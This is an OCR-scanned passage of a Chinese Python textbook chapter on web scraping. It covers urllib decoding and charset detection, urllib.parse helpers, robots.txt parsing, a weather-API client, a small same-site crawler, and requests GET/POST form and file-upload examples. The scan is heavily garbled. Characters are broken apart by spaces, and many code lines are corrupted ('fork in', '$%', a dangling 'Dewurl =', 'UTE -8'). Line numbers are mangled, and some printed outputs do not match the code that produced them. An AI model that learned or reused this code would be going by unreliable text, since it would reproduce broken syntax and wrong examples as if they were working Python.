>>> data = html. decode( 'utf — 8') 
>>> print (data) 


<! DOCTYPE htm]l ><! —— STATUS OK -一 >< html >< head ><meta http - equiv = "content - type" content 
= "text/html;charset = UTF - 8">< meta http— equiv= "X— UA— Compatible" content = "IE= Edge"> 
<meta content = "always" name = "referrer">< meta name = "theme - color" content = "#2932el">< 
link rel = "shortcut icon" href = "/favicon. ico" type = "image/x- icon" />< link rel = "icon" 
sizes = "any" mask href = "//www. baidu. com/img/baidu. svg">< link rel = "dns - prefetch" href 
="//sl.bdstatic. com"/>< link rel = "dns - prefetch" href ="//t1.baidu. com"/>< link rel = "dns 
— prefetch" href = "//t2.baidu. com"/>< link rel = "dns - prefetch" href = "//t3. baidu. com"/>< 
link rel = "dns - prefetch" href = "//t10. baidu. com"/>< link rel = "dns - prefetch" href = "// 
t11. baidu. com"/>< link rel = "dns - prefetch" href = "//t12. baidu. com"/>< link rel = "dns - 
prefetch" href = "//bl.bdstatic. com"/><title> 百 度 一 下 ,你 就 知道 </title> 

< style index = "index" id = "css_index"> html, body{height:100%}html{overflow — y:auto}# 
wrapper{position: relative; _position: ;min - height:100 % }# head{padding - bottom:100px; text 
—align:center; *z 


上 面 的 代码 直接 使 用 UTF-8 进行 解码 ,但 有 些 时 候 网 页 的 编码 方式 会 是 不 同 的 ,需要 
灵活 地 解码 ,下 面 从 网 页 中 取出 网 页 的 编码 方式 ,然后 , 青 对 网 页 进行 解码 。 
例 [ch14-2-1. py】 


#1! /usr/bin/env python 
非 一 一 coding:utf~8 -# 一 
import urllib. request 


从 字符 串 中 抽取 位 于 subl 和 sub2 之 间 的 子 字符 串 


1 
2 
3 
4 
5. def encoding(text, subl, sub2): 
6 
7 
8 
a 


return text. split(subl, 1)[ -1].split(sub2，1)[0] 


11. fp = urllib.request.urlopen("http://www.2345.com") 

12. htmlbytes = fp.read(500) 

13. encoding = encoding(str(htmlbytes).lower(), 'charset =', '"') 
14. # 读 取 网 页 中 的 编码 方式 

15, print(*—~ "*50) 

16. print( "Encoding type = %s" $% encoding ) 

17. print('—'*50) 

18. if encoding: 


19. # 注意 Python 3 读 取 的 HTML 内 容 不 是 字符 串 ,而 是 bytearray, 需 要 用 decode( ) 方 法 进行 解码 


20. mystr = htmlbytes. decode(encoding) 
21, print(mystr) 
22. else: 


23， print(" 没 找到 编码 方式 !") 
24. fp.close() 


执行 上 面 的 代码 ,有 时 可 能 获取 不 到 网 页 编码 方式 ,下 面 使 用 第 三 方 检测 工具 chardet 
获取 网 页 编码 方式 ,然后 再 进行 解码 。chardet 的 安装 命令 为 pip install chardet, chardet. 
detect() 方 法 返回 数据 类 型 为 字典 , 'encoding ' 键 对 应 的 值 为 要 检测 的 字符 串 的 编码 方式 ， 
'confidence' 键 对 应 的 值 为 概率 值 。 
例 [ch14-2-1.py】 
间 一 * 一 coding:utf-8 一 * 一 
import chardet 
import urllib. request 
def detect( data): 


至 
2 
4 
5. charset = chardet. detect(data) [ 'encoding'] #['encoding'] 对 应 字符 串 的 编码 值 
6 return charset 

7 

8 

9 


url = 'http://www.2345. com/' 
html = urllib. request.urlopen(url). read(1000) 
10. charset = detect(html) 
11. print("charset:"+ charset) 
12. decodedhtml = html. decode(charset) 
13. print(decodedhtml) 


程序 运行 结果 : 


charset :GB2312 

<!doctype html > 

< html >< head > 

<meta http - equiv = "Content ~ Type" content = "text/html; charset = gb2312" /> 

<meta http— equiv= "X— UA— Compatible" content = "IE = EmulateIE7" /> 

<meta http— equiv = "mobile ~ agent" content = "format = xhtml;url = http://m.2345. com"> 

< meta name = "Description"” content = "2345. com 热门 网 址 导航 站 网 罗 精 彩 实用 网 址 , 如 音乐 小 说 、 
NBA、 财 经 购物、 视频 、 软 件 及 热门 游戏 网 址 大 全 等 ,提供 了 多 种 搜索 引擎 入 口 .实用 查询 、 天 气 预报 、 
个 性 定制 等 实用 功能 , 帮助 广大 网 友 畅 游 网 络 更 轻松 .”/> 


可 以 看 出 ,www. 2345. com 网 站 的 编码 为 GB2312 ,经 解码 后 ,可 以 获取 网 页 内 容 了 。 
14.2.2 urllib. parse 模块 


urllib. parse 模块 提供 了 解析 URL 字符 串 的 功能 , 它 主要 的 功能 是 把 URL 字符 串 拆 
分 成 它 的 组 成 部 分 ,或 者 是 把 它 的 组 成 部 分 组 成 为 一 个 完整 的 URL 字符 串 。 该 模块 提供 
的 常用 方法 有 urlparse() .parse_qs() parse_qsl() .urlunparse() .urlsplit() .urlunsplit() 、 
urljoin() .urldefrag() .urlencode() 等 。 

1. urllib. parse. urlparse(CurlstringL , scheme= '', allow_fragments= True|) 

该 函数 的 功能 是 将 urlstring 解析 成 各 个 部 件 . 如 果 在 urlstring 中 没有 给 定 协议 或 者 规 
则 ,将 使 用 scheme; allow_fragments 二 True 决定 是 否 允 许 有 URL 零 部 件 。urlstring 为 字 
符 串 , 它 的 格式 是 scheme://netloc/path; parameters? query # fragment, 每 个 元 素 都 是 字 
符 串 ,也 可 能 是 空 的 。 

示例 : 


>>> from urllib. parse import urlparse 
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>>> a = urlparse('http://www.tsinghua. edu. cn/publish/newthu/index. html') 
>>> a 


ParseResult( scheme = 'http', netloc = 'www. tsinghua. edu. cn"，path = '/publish/newthu/index. html 


', params = "'', query= '', fragment = '') 


>>> a. Scheme 
"http' 
>>> a. hostname 


‘www. tsinghua. edu. cn' 


>>> a. geturl() 


'http://www. tsinghua. edu. cn/publish/newthu/index. html' 


2. urllib. parse. urljoin(base. url, allow_fragments = True) 
取得 URL 的 基部 base 和 url 拼合 成 一 个 完整 的 URL: 


>>> from urllib. parse import urljoin 
>>> urljoin( 'http://www. cwi. nl/ % 7Eguido/Python. html', 'FAQ. html1') 


‘http://www. cwi. nl1/ % 7Eguido/FAQ. html' 


3. urllib. parse. urlencode(query, doseq= False. safe='', encoding= None， 
errors= None) 

将 一 个 映射 对 象 或 双 元 素数 组 序列 转换 为 已 编码 的 字符 串 。 如 果 合 成 的 字符 串 被 
urlopen() 函数 进行 了 POST 操作 ,那么 将 被 编码 为 字 节 串 ; 否则 ,将 导致 类 型 错误 。 

结果 字符 串 是 一 系列 被 '&' 分 开 的 key= value 对 , 当 双 元 素 的 数组 序列 作为 查询 参数 
时 ,第 一 个 元 组 是 key, 第 二 个 元 素 是 value, 被 编码 的 字符 串 中 参数 的 顺序 和 参数 数组 的 顺 
序 是 一 样 的 。 

>>> import urllib. parse 

>>> import urllib. request 

>>> paradict = { 'name': 'zhangsan', 'age':23, 'sex': 'Male'} 

>>> params = urllib.parse.urlencode(paradict) 


>>> params 
"sex = Male&age = 23&name = zhangsan'” 


4. urllib. parse. quote(string, safe= '/'. encoding= None, errors= None) 


函数 功能 使 用 ”xx 替换 特定 的 字符 ,而 字符 ,数字 及 “_. -” 不 被 替换 ,这 里 xx 为 代表 该 
字符 的 ASCII 码 的 十 六 进 制 值 。 默 认 情 况 下 ,该 函数 会 替换 URL 的 路 径 部 分 ,可 选 参数 
safe 指定 的 字符 不 被 替换 一 一 默认 值 为 “/”。 

5. urllib. parse.quote_plus() 与 quote() 相 近 ,只 是 将 空格 编码 为 +” 

示例 : 


>>> import urllib. parse 
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>>> name = 'Lucy White' 

>>> age = 18 

>>> base = 'http://www. yoursite. com/cgi— bin/query.py' 
>>> paras = '%s?name= $% s&age= %d' % (base,name,age) 


>>> paras 
'http://www. yoursite. com/cgi — bin/query. py?name = Lucy Whitegage = 18°' 


>>> encodedpara = urllib.parse. quote(paras) 
>>> encodedpara 


"http % 3A//wuw. yoursite. com/cgi - bin/query. py % 3Fname % 3DLucy % 20White % 26age % 3D18' 


>>> codepluspara = urllib.parse. quote plus(paras) 
>>> codepluspara 


‘http% 3A % 2F % 2Fwww. yoursite. com % 2Fcgi— bin% 2Fquery. py % 3Fname % 3DLucy + White % 26age % 
3D18" 


14.2.3 urllib 其 他 模块 


1. urllib. response 模块 

urllib. response 模块 包括 的 函数 与 类 有 read() 和 readline(), 典 型 的 响应 对 象 是 一 个 
addinfourl 实例 ,该 实例 定义 了 info() 方 法 , 它 返 回 headers() 方 法 和 geturl() 方 法 。 这 些 函 
数 将 会 在 urllib. request 模块 中 被 用 到 。 

2. urllib. error 模块 

urllib. error 模块 定义 urllib. request 抛 出 的 异常 类 : URLError 和 HTTPError。 

3. urllib. robotparser 模块 


urllib. robotparser 模块 提供 了 单一 的 类 一 一 RobotFileParser, 它 回答 了 是 否 或 者 不 用 
特定 的 用 户 代 理 获 取 Web 网 站 发 布 的 robots. txt 文件 。robots. txt 是 搜索 引擎 访问 网 站 
的 时 候 要 查看 的 第 一 个 文件 , 当 一 个 搜索 蜂 蛛 访问 一 个 站 点 时 , 它 会 首先 检查 该 站 点 根 目 录 
下 是 否 存 在 robots. txt, 如 果 存 在 ,搜索 机 器 人 就 会 按照 该 文件 中 的 内 容 来 确定 访问 的 范 
围 ; 如 果 该 文件 不 存在 ,所 有 的 搜索 蜂 蛛 将 能 够 访问 网 站 上 所 有 没有 被 口令 保护 的 页 面 。 
仅 当 网 站 包含 不 希望 被 搜索 引擎 收录 的 内 容 时 , 才 需 要 使 用 robots. txt 文件 。 如 果 和 希望 搜 
索引 擎 收录 网 站 上 所 有 内 容 , 请 勿 建立 robots. txt 文件 。 关 于 结构 化 文件 robots. txt 更 多 
细节 请 参见 http://www. robotstxt. org/orig. html。 


urllib. robotparser. RobotFileParser(url = "') 


该 类 提供 的 方法 用 于 读 取 、 解 析 、 回 答 关 于 URL 中 robots. txt 文件 的 问题 。 
示例 : 


>>> import urllib. robotparser 

>>> rp = urllib. robotparser. RobotFileParser() 

>>> rp. set_url("http://www.musi- cal. com/robots. txt") 
>>> rp. read() 
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>>> rp.can fetch(" *", "http://www.musi— cal.com/cgi— bin/search?city= San+ Francisco") 


True 


>>> rp.can fetch(" *", "http://www.musi— cal.com/") 


True 


14.2.4 获取 天 气 预 报 数据 
中 国 国 家 气象 局 提供 了 两 个 天 气 预 报 接口 : 


http://www. weather. com. cn/data/sk/101010100. html # 实 时 天 气 接 口 
http://www. weather. com. cn/data/cityinfo/101010100. html ”# 当 天 天 气 接口 


上 面 URL 中 的 101010100 是 城市 代码 ,这 里 是 北京 的 城市 代码 ,我 们 把 城市 名 与 代码 
放 入 ch14_2_city. py。 只 需 改 变 城市 代码 ,就 可 以 得 到 你 所 在 城市 的 天 气 信息 。 天 气 信息 
为 json 格式 ,json 格式 是 一 种 轻 量 级 的 数据 交换 格式 ,通常 表示 为 “ 键 / 值 ”对 的 集合 形式 ， 
如 中 国 国家 气象 局 天 气 预 报 接口 返回 值 为 


'{"weatherinfo":{"city":" 北 京 ", "cityid":"101010100", "temp":"18", "WD":" 东 南 风 ", "WS":"1 
级 ", "SD":"17%", "WSE":"1","time":"17:05","isRadar":"1","Radar":"JC_ RADAR_ A29010_JB", 
"njd":" 暂 无 实况 ", "gy":"1011", "rain":"0"}}" 


从 网 络 读 取 并 分 析 各 地 城市 天 气 状况 。 
例 [ch14 2 4weather. py】 


1 #encoding:utf -8 

2. import urllib. request 

EE from chl4 2 _ city import city 

4 import json 

5. import os 

6 

7. weathercode = {"cityid":" 城 市 代码 "， 
8 "time" :" 播 报时 间 "， 
9. "city":" 城 市 "， 

10. "SD" :" 湿 度 "， 


11. "WD":" 风 向 "， 

12. "HS":" 风 速 "， 

ES "temp":" 气 温 "， 

14. "rain":" 降 雨 "， 

15, "qy":" 晴 雨 "， 

16. "Radar":" 雷 达 图 地 址 "， 

a "isRadar":" 是 否 有 雷达 图 "， 
18. "HSE":" 风 力 "， 

19. "njd" :" 能 见 度 " 

20. }# 定 义 天 气 代码 含义 字典 


21. cityname = input(" 请 输入 要 查询 的 城市 (如 北京 ): ") 
22. if cityname == "": 
23. cityname = ' 北 京 ' 


24. citycode = city.get(cityname, "该 城市 不 存在 ") 
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25. if citycode == "该 城市 不 存在 ": 

26. print(" 该 城市 不 存在 ") 

27. os._exit(0) 

28. url = 'http://www. weather. com. cn/data/sk/{fcitycode}.html'. format(citycode = citycode) 
29. url file = urllib.request.urlopen(url) 

30. weatherHTML = url file.read().decode('UTE -8') 

31. weatherJSON = json.JSONDecoder().decode(weatherHTML) 

32. weatherInfo = weatherJSON[ 'weatherinfo'] 

33. fork in weatherInfo. keys(): 

34. print("{}:{}".format(weathercode. get(k,k), weatherInfo. get(k))) 


14.2.5 简单 的 网 站 息 虫 


抓 取 网 页 之 前 需 准 备 以 下 几 个 前 提 条 件 。 

(1) 抓 取 网 页 的 起 始点 ,也 就 是 种 子 ,一 般 为 某 一 网 站 的 URL。 

(2) 准备 要 抓 取 的 网 页 ,一 般 都 用 队列 存储 将 要 抓 取 的 网 页 。 在 Python 3. x 中 Queue 
和 collections. deque 模块 支持 队列 的 操作 ,Queue 使 用 put() 方 法 往 队 列 中 添加 新 元 素 ,get() 
方法 从 队列 头 部 获得 元 素 。 操 作 如 下 : 


>>> import queue 

>>> q= queue. Queue() 
>>> q.put(0) 

>>> q.put(1) 

>>> q. put(2) 

>>> q. put(3) 

>>> print(q) 


< queue. Queue object at 0x00000000024CRC18 > 
>>> print(q. queue) 

deque([0, 1, 2, 3]) 

>>> print(q.get()) 


0 


>>> print(q.queue) 


deque([1, 2, 3]) 


Collections 模块 中 的 deque 是 双 端 队列 ,使 用 append() 方 法 添加 元 素 ,popleft() 方 法 
从 左 端 弹出 元 素 。 操 作 如 下 : 


>>> from collections import deque 
>>> deq = deque() 

>>> deq. append( 'apple') 

>>> deq. append( 'banana') 

>>> deq. append( 'orange') 

>>> deq. append( 'pear') 

>>> list(deq) 
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>>> deq. popleft() 
"apple" 

>>> deq. popleft() 
p oe 

>>> list(deq) 


['orange', 'pear'] 


(3) 爬虫 抓 取 回来 的 是 含有 HTML 标签 的 网 页 ,在 网 页 中 找到 指向 其 他 网 页 的 超级 链 
接 是 扩展 抓 取 范 围 的 基础 。 正 则 表达 式 是 对 网 页 进行 分 析 的 重要 工具 ,通过 它 ,找到 网 页 中 
的 超级 链接 ,可 以 进一步 扩展 抓 取 的 范围 。 超 级 链接 类 似 于 以 下 几 种 形式 : 


<a href = "http://url"> 新 链接 </a> 
或 

<a href = "/url"> 新 链接 </a> 

或 

<a href = "url"> 新 链接 </a> 


第 一 种 超级 链接 中 的 url 是 绝对 地 址 ,获取 引号 中 的 url 后 , 即 可 抓 取 新 的 网 页 ,第 二 
种 .第 三 种 超级 链接 是 相对 地 址 ,这 时 就 需要 用 到 urllib. parse. urljoin(baseurl, suburl) 将 
baseurl 与 suburl 连接 成 为 一 个 完整 的 绝对 地 址 url。 

(4) 我 们 设计 的 疏 虫 程序 可 以 正确 地 抓 取 单 个 网 页 ,但 抓 取 多 个 网 页 时 ,有 时 会 不 停 地 
运行 ,出 现 这 种 情况 的 原因 是 多 个 网 页 中 有 交叉 的 超级 链接 ,比如 ,网 页 A 包含 网 页 B 的 超 
级 链接 ,同时 网 页 B 中 又 包含 网 页 A 的 超级 链接 , 抓 取 网 页 时 可 能 会 出 现 循环 抓 取 的 情况 。 
为 了 避免 这 种 情况 的 出 现 , 在 小 规模 抓 取 时 ,一 般 使 用 集合 存储 即将 抓 取 的 URL ,集合 中 的 
元 素 不 能 重复 。 当 准备 获取 一 个 新 的 URL 时 ,要 先 判断 集合 中 是 否 存 在 该 URL, 若 存在 则 
说 明 该 URL 已 经 抓 取 过 ; 若 不 存在 则 说 明 未 抓 取 过 ,应 当 立 即 抓 取 。 操 作 如 下 ， 

willvisit = set() 

willvisit.add(newurl) 

这 里 的 newurl 为 一 个 字符 串 型 的 URL, 使 用 add() 方 法 就 会 将 URL 作为 一 个 字符 串 
整体 添加 到 集合 中 。 

例 [ch14_2_5spider. py】 

井 coding:utf 一 8 
import re 
import queue 


import urllib. request 
import urllib. error 


UAWODp 
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6. from urllib.parse import urlparse, urljoin 

7. import urllib 

8. from collections import deque 

9. import chardet 

10. 

11. def detect(data): 

12. "检测 网 页 编码 方式 '”" 

13. charset = chardet. detect(data)['encoding'] #['encoding'] 键 对 应 字符 串 的 编码 值 
14. return charset 

ee 

16. def getlinks(html) : 

Wn ""' 网 页 内 容 中 获取 超级 链接 '" 

18. linkre = re.compile('href =["\'](. +?)["\']', re.IGNORECASE) 

19. return linkre. findall(html) 

20. 

21. def pageread(url): 

2 """ 读 取 网 页 内 容 并 解码 '”" 

23. html = b"" 

24. try: 

25. html = urllib. request.urlopen(url). read() 

26. except urllib. error. HTTPError as e: 

Ws print(e) 

28. return str(e) 

29. charset = detect(html) 

30. decodedhtml = html. decode(charset) 

331. return decodedhtml 

32. 

33: 

34. baseurl = 'http://www. lnpc.cn' # 起 始 地 址 

35. queue = deque() # 定 义 双 向 队列 用 于 存储 即将 抓 取 的 URL 
36. willvisit = set() # 定 义 集合 ,用 于 去 除 重复 的 URL 

37. queue.append(baseurl) # 起 始 地 址 作为 第 一 个 元 素 被 放 入 队列 

38. willvisit.add(baseurl) # 把 起 始 URL 标记 为 已 访问 

39. get cnt = 0 # 获取 的 网 页 数 

40. append cnt=0 # 往 队列 中 添加 的 URL 数量 

41. 

42. while queue: 

43. willget_url = queue. popleft() 井 队 首 元 素 出 队 

44. print(' 已 经 抓 取 : ' + str(get_cnt) + “正在 抓 取 <-- 一 ' + willget_url) 
45. get cnt += 1 

46. decodedhtml = pageread(willget_url) ”上 # 读 取 网 页 内 容 

47. #print(decodedhtm]) # 打 印 网 页 内 容 

48. if append_cnt > 100: # 抓 取 的 地 址 数 超过 100 时 不 再 往 队 列 中 加 入 新 的 URL 
49. continue 

50. for x in getlinks(decodedhtml) : 

51. Dewurl = 

52， x= x. strip() 

53; if ((x[0:4] == 'http') and ('. htm' in x) and (baseurl in x)) and (x not in 
willvisit) : # 绝 对 地 址 

54. queue. append (x) # 将 准备 抓 取 的 URL 加 入 队列 

SS willvisit.add(x) 井 将 准备 抓 取 的 URL 加 入 集合 

56. print(' 加 入 第 '+ str(append_cnt) + ' 个 队列 -- -> ' + x) 

-1 append cnt += 1 

58. else: 并 相对 地 址 转换 为 绝对 地 址 

59. newurl = urljoin(willget url,x) 

60. if ((newurl not in willvisit) and (baseurl in newurl) and ('.htm' in x) ) : 
61. # baseurl in newurl 将 抓 取 范围 限定 本 网 站 内 ,". htm' in x 限定 仅 抓 取 htm 网 页 
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62. queue. append (newurl1) # 将 准备 抓 取 的 URL 加 入 队列 

63. willvisit.add(newurl) 井 将 准备 抓 取 的 URL 加 入 集合 

64. print(' 加 入 第 '+ str(append_cnt) + ' 个 队列 -- -> ' + newurl) 
65. append cnt += 1 


(本 说 明 : 第 16~19 行 ,getlinks( 函 教 获 取 网 页 中 的 超级 链接 ,最 后 返回 一 个 起 级 链 
接 的 列表 。 

第 18 行 ,超级 链接 的 正则 表达 式 为 'href 二 ["\'](. 十 ?)["\']', 括 号 中 的 字符 串 即 为 链 
接地 址 。 

第 21 一 31 行 ,pageread() 函 数 读 取 网 页 ,由 于 URL 错误 、 网 页 不 存在 等 各 种 原因 , 读 取 
时 可 能 会 出 现 错误 ,因此 这 里 捕获 了 异常 。 出 现 异 常 时 ,通过 return str(e) 语 和 句 把 错误 信息 
作为 网 页 内 容 返 回 。 

第 42 行 , 循 环 , 当 队列 中 有 元 素 时 会 一 直 循 环 下 去 ,进行 网 页 读 取 。 

第 43 行 ,从 队列 中 取出 URL 地 址 。 

第 46 行 , 读 取 网 页 内 容 。 

第 50 行 ,从 网 页 内 容 中 找 出 所 有 超级 链接 。 

第 53 行 ,判断 链接 URL 地 址 是 否 以 HTTP 开头 , 即 绝对 地 址 ,这 样 的 地 址 可 以 直接 处 
理 ; '. htm'in x 为 真 则 表示 本 例 只 关注 . htm 或 .html 网 页 ; baseurl in x 为 真 则 表示 把 抓 取 
范围 限定 在 起 始 站 点 ; x not in willvisit 为 真 则 表示 以 前 未 抓 取 过 。 

第 58 行 ,开始 处 理 相对 地 址 , 即 类 似 于 /Info/1/5446. html、1_2. html 这 样 的 链接 地 址 ， 
把 http://www. lnpc. cn 与 /Info/1/5446. html 连接 组 成 完整 的 URL 地 址 http://www. 
lnpc. cn//Info/1/5446. html; 在 http://www. lnpc. cn/1/1_1. html 网 页 中 使 用 了 分 页 技 
术 ,1_2. html 表示 下 一 页 ,把 http://www. lnpc. cn/1/1_1. html 与 1_2. html 组 成 新 的 
URL 地 址 http://www. lnpc. cn/1/1_2. html。 

该 程序 在 功能 实现 上 有 一 定 的 缺陷 ,把 要 抓 取 的 URL 地 址 放 到 集合 中 防止 出 现 重复 ， 
这 是 很 占用 内 存 的 ,该 程序 只 能 适 于 小 规模 的 抓 取 , 若 要 大 规模 抓 取 ,一 般 用 数据 库存 储 要 抓 
取 的 URL, 并 建立 主键 用 于 保证 其 唯一 性 。 有 些 网 站 对 客户 端 做 了 限定 ,只 允许 浏览 器 进行 
浏览 ,为 此 ,网 络 疏 虫 必须 模拟 浏览 器 ,并 指定 一 些 参数 ,而 本 例 目前 尚 不 具备 这 些 功 能 。 


14.3 使 用 requests 抓 取 网 络 数据 


前 面 小 节 使 用 Python 3 的 标准 库 urllib 抓 取 网 络 数据 ,实现 了 网 络 怜 虫 的 基本 功能 ， 
这 个 模块 作为 人 门 的 基本 工具 还 是 非常 好 的 ,对 了 解 怜 虫 的 基本 理念 ,掌握 怜 虫 抓 取 数据 的 
流程 很 有 帮助 。 入 门 之 后 ,就 需要 学 习 一 些 更 加 高 级 的 内 容 和 工具 来 方便 抓 取 。 这 一 节 将 
简单 介绍 requests 库 的 基本 用 法 。 与 更 底层 的 urllib 相 比 较 requests 使 用 起 来 更 加 方便 简 
易 。requests 支持 国际 化 域名 和 URL、Keep-Alive & 连接 池 、 带 持久 Cookies 的 会 话 、 多 种 
认证 方式 .优雅 的 键 / 值 Cookies 自动 解压 与 解码 、 文 件 分 块 上 传 等 功能 。requests 已 成 为 
抓 取 网 页 数据 的 利器 。 

requests 官方 网 站 : http://www. python-requests. org/en/master/, 中文 版 网 站 : 
http://cn. python-requests. org/zh_CN/latest/ ,最 新 版 本 为 V2. 12.4, 它 的 安装 方法 为 


> pip install requests 


14. 3.1 requests 基本 用 法 
下 面 看 requests 的 基本 用 法 : 


>>> import requests 
>>>r = requests.get('http://www. tup. tsinghua. edu. cn') 
>>> print(type(r)) 并 打印 返回 结果 的 类 型 


<class 'requests. models. Response'> 


>>> print(r. status_code) 井 打印 状态 码 

200 

>>> print(r. encoding) 井 打印 网 页 的 编码 方式 
ISO- 8859 -1 

>>> print(r. cookies) # 打印 会 话 的 Cookies 


< RequestsCookieJar[ ]> 


>>> print(r. headers) # 打印 请 求 头 


{'X— Powered - By': 'Html', 'Server': 'Microsoft - IIS/7.5', 'Vary': 'Accept - Encoding', 'Content 
—Type': 'text/html', 'Last - Modified': 'Wed, 12 Aug 2015 05:37:38 GMT', 'ETag': '" 
9b15b9ffc0d4d01:0"'，'Content — Encoding': 'gzip', 'Accept - Ranges': 'bytes', 'Date': 'Mon, 16 Jan 
2017 07:48:55 GMT', 'Content - Length': '723'} 


>>> r. text# 查 看 响应 内 容 


<! DOCTYPE html PUBLIC " — //W3C//DTD XHTML 1. 0 Transitional//EN" "http://www. w3. org/TR/ 
xhtml1/DTD/xhtmll - transitional. dtd">\r\n\r\n< html xmlns = "http://www. w3. org/1999/xhtml">\ 
r\n<head>\r\n <title></title>\r\n</head>\r\n< script type = "text/javascript">\r\n\r\ 
n … \r\n</script>\r\n<body>\r\n\r\n</body>\r\n</html >\rNn' 


>>> r.content# 查 看 二 进 制 响应 内 容 


b'\xef\xbb\xbf <! DOCTYPE html PUBLIC " - //W3C//DTD XHTML 1.0 Transitional//EN" "http://waw. 
w3. org/TR/xhtml1/DTD/xhtml1 — transitional. dtd">\n < htm] xmlns = "http://www. w3. org/1999/ 
xhtml">\n< head>\n< title ></title>\n </head >\n< script type = "text/javascript">\r\n\r\n 
//\xe5\xb9\xb3\xe5\x8f\xbO\xe3\x80\x81\xe8\xae\xbe\xe5\xa4\x87\xe5\x92\x8c\xe6\x93\x8d\ 
xed\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\r\n var system = {\r\n win: false,\r\n mac: false,\r\n 
xl1: false\r\n };\r\n //\xe6\xa3\x80\xe6\xb5\x8b\xe5\xb9\xb3\xe5\x8f\xb0\r\n var p = 
navigator. platform;\r\n //alert(p);\r\n\r\n /x* x var sUserAgent = navigator. userAgent. 
toLowerCase();\r\n alert(sUserAgent); * /\r\n\r\n system. win = p. indexOf("Win") == 0;\r\n 
system. mac = p. indexOf("Mac") == 0;\r\n system.xll = (p == "X11") || (p. indexOf("Linux") 
== 0);\r\n //\xe8\xb7\xb3\xe8\xbd\xac\xe8\xaf\xad\xe5\x8f\xa5\r\n if (system. win | | 
system. mac | | system. x11) {//\xe8\xbd\xac\xe5\x90\x91\xe5\x90\x8e\xe5\x8f\xb0\xe7\x99\xbb\ 
xe9Nx99Nx86\xe9NxalNxb5Nxe9\x9dNxa2NrNn window. location.href = "index.html";\r\n } else {\ 
Ir\n window. location. href = "/wap/tszx.aspx";\r\n }\r\n \r\n</script>\n<body>\n</body>\n 
</html >\n' 
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14.3.2 GET( ) 方 法 传递 参数 
网 页 中 通常 使 用 表单 进行 数据 的 传输 ,通常 有 类 似 于 下 面 的 HTML 代码 : 


< form method = 'get' action = "/getlogin" name = "login"> 
<h4 align = "center"> 登 录 名 : < input name = "username" type = "text"></h4 ><br> 
<h4 align = "center"> 密 码 : < input name = "password" type = "password"></h4><br> 
<h4 align = "center">< button type = "submit"> 登 录 </button></h 
</form> 
上 面 代 码 中 method 王 "get" 表 明 表 单 利 用 GET() 方 法 传输 数据 。GET() 方 法 将 表单 
中 的 数据 按照 variable 二 value 的 形式 添加 到 URL 后 面 ,并 且 两 者 使 用 “?” 连 接 , 而 各 个 变 
量 之 间 使 用 “&.” 连 接 。 
例如 ,运行 13. 2. 3 小 节 的 loginget. py, 网 页 是 一 个 表单 ,这 时 使 用 requests 的 params 
参数 ,以 一 个 字典 来 提供 这 些 参数 ,如 username= 二 lisi 和 password 王 123456,Web 主机 的 IP 
为 http://192.168.1.100, 那 么 可 以 使 用 下 面 的 代码 : 
>>> getload = {'username': 'admin', 'password':'123456'} 
>>r = requests.get("http://192.168.1.100/getlogin", params = getload) 
注意 上 面 的 代码 是 使 用 requests 的 GET() 方 法 传输 数据 ,是 对 params 进行 赋值 。 通 
过 打印 输出 该 URL, 能 看 到 URL 已 被 正确 编码 : 


>>> r.url 
'http://192.168.1.100/getlogin?password = 123456&username = lisi' 
>>> r. text 


< h3> 你 好 ,lisi!</h3>' 


r. text 为 网 站 的 响应 信息 ,显示 该 信息 说 明 requests 使 用 GETO 方 法 已 经 模拟 登录 成 
劲 了 。 


14.3.3 POST() 方 法 传递 参数 


1. 传递 表单 数据 

与 GET() 方 法 传输 数据 不 同 ,POST() 方 法 则 把 数据 放 到 数据 块 中 ,在 requests 中 是 
POST() 方 法 传输 数据 ,并 且 是 对 data 进行 赋值 。 比 如 ,用 下 面 的 代码 对 13. 2. 3 小 节 中 的 
loginpost. py 程序 进行 模拟 登录 , 先 运 行 之 python loginpost. py, 然 后 在 IDLE 中 运行 下 面 
的 代码 : 

>>> postload = {'username': 'lisi', ‘password':'123456'} 


>>>r = requests.post("http://192.168.1.100/postlogin", data = postload) 
>>> r.url 


"http://192.168.1.100/postlogin' 


>>> r. text 
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必 3> 你 好 , lisi!</h3>' 


r. text 为 网 站 的 响应 信息 ,显示 该 信息 说 明 requests 已 经 使 用 POST() 方 法 模拟 登录 
成 功 了 。 

2. 传递 json 格式 数据 

POST() 方 法 传递 数据 时 ,data 不 仅 可 以 接受 字典 类 型 的 数据 ,还 可 以 接受 json 等 格式 。 


>>> payload = {'usernanme': "lisi', ‘password': '123456"'} 

>>> import json 

>>> r = requests.post('http://httpbin. org/post', data = json. dumps(payload)) 
>>> r. text 


'{\n "args": {}, \n "data": "{\\"username\\": \\"lisi\\", \\"password\\": \\"123456\\"}", \n 
"files": {}, \n "form": {}, \n "headers": {\n "Accept": "*/*", \n "Accept - Encoding": 
"gzip", \n "Content - Length": "42", \n "Host": "httpbin. org", \n "User - Agent": "python — 
requests/2.12.4", \n "Via": "http/1.1 ATS CLUSTER[41310E9C] (ApacheTrafficServer/5.3.2)"\n 
}, \n "json": {\n "password": "123456", \n "username": "lisi"\n }, \n "origin": "64.62.175. 
75", \n "url": "http://httpbin. org/post"\n} \n' 


3. 传递 文件 
很 多 情况 下 ,表单 要 求 用 户 上 传 文件 ,针对 这 样 的 表单 requests 也 可 以 上 传 文件 。 在 当 


前 目录 下 创建 test. txt 文件 ,文件 内 容 是 abcdefghijklmn, 使 用 下 面 的 命令 可 以 看 到 上 传 表 
单 files 的 内 容 : 


>>> import requests 
>>> url = 'http://httpbin. org/post' 


>>> files = {'file': open('test. txt', 'rb')} 
>>r = requests.post(url, files= files) 
>>> r. text 


'{\n "args": {}, \n "data": "", \n "files": {\n "file": "abcdefghijklmn"\n }, \n "form": {}, \ 
n "headers": {\n "Accept": "x*/*", \n "Accept - Encoding": "gzip, deflate", \n "Content 一 
Length": " 158", \ n " Content — Type": " multipart/form — data; boundary = 
30elc99133e04ab99a35e7b3ad7a066c", \n "Host": "httpbin. org", \n "User - Agent": "python— 
requests/2.12.4"\n }, \n "json": null, \n "origin": "223. 102.0.34", \n "url": "http:// 
httpbin. org/post"\n} \n’ 


也 可 以 显 式 地 设置 文件 名 : 


>>> import requests 

>>> url = 'http://httpbin. org/post' 

>>> files = {'file': ('test. txt', open('test. txt', 'rb'))} 
>>>r = requests.post(url, files= files) 

>>> r.text 


'{\n "args": {}, \n "data": "", \n "files": {\n "file": "abcdefghijklmn"\n }, \n "form": {}, \ 
n "headers": {\n "Accept": "*/x*", \n "Accept - Encoding": "gzip, deflate", \n "Content — 
